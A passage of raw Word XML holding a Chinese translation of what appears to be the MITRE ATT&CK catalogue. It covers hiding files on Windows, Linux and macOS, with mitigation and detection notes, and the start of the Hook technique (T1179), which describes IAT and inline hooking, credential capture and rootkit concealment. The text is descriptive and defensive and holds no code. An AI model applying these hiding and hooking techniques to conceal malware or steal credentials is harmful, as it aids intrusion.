      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将文件或文件夹标记为隐藏。类似地，可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+ s</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”将文件标记为系统文</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>件，使用“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+ r</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”将文件标记为只读。与大多数</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件一样，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attrib.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件提供了以递归方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/ S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用这些更改的能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061B62B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Linux/Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F96755F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户只需输入“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”作为文件名或文件夹名的第一个字符，就可以将特定文件标记为隐藏。默认情况下，以句点“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”开头的文件和文件夹在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Finder</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用和标准命令行实用程序（如“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”）中不显示。用户必须专门更改设置才能查看这些文件。对于使用命令行的情况，通常可用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个标志来查看所有文件（包括隐藏的文件）。要在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Finder</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用中查看这些文件，必须执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>defaults write com.apple.finder AppleShowAllFiles YES</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令并重新启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Finder</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A21B0FA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098F3D37" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ac</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的文件如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uf_hidden</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标记，那么在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>finder.app</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中看不到文件，但在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>terminal.app</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中仍可以看到。许多应用程序使用隐藏文件和文件夹来存储信息，这样就不会使用户的工作区变得杂乱无章。例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序创建一个隐藏的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹，用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>存储</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户的已知主机和密钥信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572C2B04" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547B0F98" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10121D94" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220564B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控文件系统和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有正在创建的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>开头</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以及是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attrib.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加隐藏属性的情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F4E7C4" w14:textId="3F2223D0" w:rsidR="000F2665" w:rsidRDefault="009C5C6F" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ook</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4BCA7887" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="256C21A5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>: T1179</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40538FCF" w14:textId="6F44AABD" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60C0BC02" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CF98153" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AE33CDE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00DB0A80" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> API</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，二进制文件元数据，动态链接库监控，加载的动态链接库，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AA30A2F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0028795A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00DB0A80">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB0A80">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="317EA983" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="6339D197" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程通常利用应用程序编程接口（</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）函数来执行需要可重用系统资源的任务。</w:t>
      </w:r>
      <w:r>
        <w:t>windows API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数通常作为导出函数存储在动态链接库（</w:t>
      </w:r>
      <w:r>
        <w:t>DLLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2A873D" w14:textId="316423D6" w:rsidR="000F2665" w:rsidRDefault="008069DA" w:rsidP="000F2665">
      <w:r>
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括将调用重定向到这些函数，可以通过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469312E4" w14:textId="733274D2" w:rsidR="000F2665" w:rsidRDefault="008069DA" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:t>程序，它拦截并执行指定的代码以响应消息、</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按键</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:t>和鼠标输入等事件</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348859B" w14:textId="52865D73" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>导入地址表（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>Hook</w:t>
      </w:r>
      <w:r>
        <w:t>，它使用对进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的修改，指向导入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603A3771" w14:textId="4FF30711" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>内联</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>Hook</w:t>
      </w:r>
      <w:r>
        <w:t>，重写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数中的第一个字节以重定向码流</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346DC35E" w14:textId="07D5B793" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与进程注入类似，攻击者可以使用</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在另一个进程的上下文中加载和执行恶意代码，屏蔽执行，同时还允许访问进程的内存，以及可能提升权限。通过正常调用函数，</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还可以利用连续的调用提供持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ECB467" w14:textId="7E77E33C" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Hook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>还可能捕获</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>调用，这些调用包含用户验证</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>凭据访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D1C9A8" w14:textId="3C1BC687" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="4F7CAC"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB0A80">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Rootkit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>通常使用</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>Hook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>隐藏文件、进程、注册表项和其他对象，从而隐藏恶意软件及其相关行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31FDC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E1D3FF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
